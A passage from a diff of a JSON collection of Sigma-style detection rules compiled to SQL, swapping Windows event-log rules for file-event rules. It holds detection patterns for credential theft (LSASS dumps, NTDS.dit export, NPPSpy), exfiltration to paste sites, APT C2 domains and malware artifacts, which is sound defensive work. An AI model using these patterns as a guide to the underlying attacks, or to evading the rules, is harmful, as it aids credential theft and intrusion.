'%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "description": "Detects windows executables that writes files with suspicious extensions", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE 
'%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": 
"ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE 
'%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. 
It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Antivirus products" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND 
RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": 
"Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" + "SELECT * FROM logs 
WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. 
Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez 
@Cyb3rPandaH", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + 
"attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "status": "test", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 
'%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msteams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Slack.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath 
